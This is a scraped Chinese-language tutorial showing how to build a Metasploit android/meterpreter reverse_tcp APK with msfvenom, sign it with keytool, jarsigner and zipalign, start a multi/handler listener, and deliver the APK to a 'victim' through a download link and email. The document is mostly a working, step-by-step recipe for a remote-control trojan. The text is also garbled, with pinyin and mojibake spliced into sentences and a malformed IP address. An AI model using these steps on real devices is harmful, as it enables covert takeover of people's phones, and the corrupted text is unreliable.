IT技術互動交流平台

彩吧助手官网

作者︰佚名  發布日期︰2020-04-02 08:07:21


文章內容可(ke)能(neng)具(ju)有一(yi)定攻擊性,本文僅供技術交流,如(ru)有非法使用後果(guo)自負(fu)。
在這(zhe)次(ci)的實(shi)驗中,我yi) 褂ali linux和安(an)卓模擬器演示(shi)如(ru)何使用Metasploit框架控制Android設備。
創(chuang)建負(fu)載
我們(men)需要兩台虛(xu)擬機︰Kali Linux和安(an)卓模擬器。

 
 
打開vm啟動Kali linux。接(jie)著打開終端,使用msfvenom制作android利用程序(xu)。

Msfvenom是msfpayload和msfencode的組合。它(ta)是一(yi)個(ge)單一(yi)的工具(ju)。它(ta)有標準的命令行(xing)選(xuan)項。 Msfvenom用來制造的有xing)?睪捎美瓷a href="http://www.it165.net/pro/ydad/" target="_blank" class="keylink">Android模擬器。
一(yi)旦打開終端提示(shi)符下(xia)輸(shu)入(ru)以下(xia)命令,使用msfvenom工具(ju)來chuang)唇ㄓ行(xing)?睪PK文件(jian)。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 設置要使用的payload
LHOST 設置用來接(jie)收反(fan)彈連接(jie)的主機
LPORT 設置用來接(jie)收反(fan)彈連接(jie)的端口
R 設置文件(jian)格式
Location 要保存的文件(jian)位置
這(zhe)個(ge)命令執行(xing)完之後,你會看到一(yi)些錯誤,但不用擔心。現在可(ke)以到輸(shu)出目錄查看生成的apk了。

 
 
我們(men)已經(jing)成功創(chuang)建了Android格式(APK)文件(jian)的有xing)?睪傘O衷諞yi)般Android的移動設備不允許(xu)安(an)裝沒有適shi)鼻├?櫚撓τ貿絛xu)。 Android設備只安(an)裝帶有簽署文件(jian)的APK。
我們(men)可(ke)以使用如(ru)下(xia)工具(ju)進(jin)行(xing)手(shou)動簽名︰
l Keytool (已安(an)裝)
l jar signer (已安(an)裝)
l zipalign (需要安(an)裝)
執行(xing)下(xia)列命令簽名。首(shou)先使用密鑰工具(ju)創(chuang)建密鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`

 
然(ran)後使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs APPNAME.apk
`

 
Kali沒有預裝Zipalign,需要先apt-get install zipalign。然(ran)後用zipalign來驗證apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

 
現在我們(men)有了一(yi)個(ge)帶有簽名的APK,它(ta)可(ke)以安(an)裝在任(ren)何設備上(shang)。

 
使用Metasploit進(jin)行(xing)測試
接(jie)下(xia)來啟動metasploit的監听器。執行(xing)msfconsole打開控制台。

 
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit

 

是時候將惡意的APK發送到手(shou)機上(shang)。我們(men)這(zhe)里使用一(yi)個(ge)網盤上(shang)傳(chuan)我們(men)的APK,並(bing)將下(xia)載鏈(lian)接(jie)分享(xiang)出去。

 
 
這(zhe)是我們(men)切(qie)換到安(an)卓模擬器。
1、從https://code.google.com/archive/p/android-x86/downloads下(xia)載android x86的iso。
2、使用vmware創(chuang)建一(yi)個(ge)內核(he)版本為(wei)2.6的虛(xu)擬機。
3、掛載鏡像,啟動虛(xu)擬機。
4、進(jin)入(ru)Live模式。
5、設置手(shou)機並(bing)登陸(lu)谷歌帳號。
在安(an)卓模擬器里面點擊那個(ge)鏈(lian)接(jie)並(bing)下(xia)載。我們(men)已經(jing)發送了一(yi)封郵件(jian)到受害者的谷歌帳號上(shang)。

 
另外要允許(xu)安(an)卓安(an)裝來歷不明(ming)的apk。



 
切(qie)換回Kali,我們(men)發現創(chuang)建了一(yi)個(ge)新的會話。

 
然(ran)後你就可(ke)以為(wei)所欲為(wei)的操作這(zhe)台“手(shou)機”了。

 
 
Tag標簽︰安(an)卓  手(shou)機  
  • 彩吧助手官网

About IT165 - 廣告(gao)服務 - 隱私(si)聲明(ming) - 版權申明(ming) - 免(mian)責條款 - 網站地(di)圖 - 網友投稿 - 聯(lian)系方式
本站內容來自于互聯(lian)網,僅供用于網絡技術學(xue)習,學(xue)習中請遵循相關(guan)法律法規
彩吧助手官网 | 下一页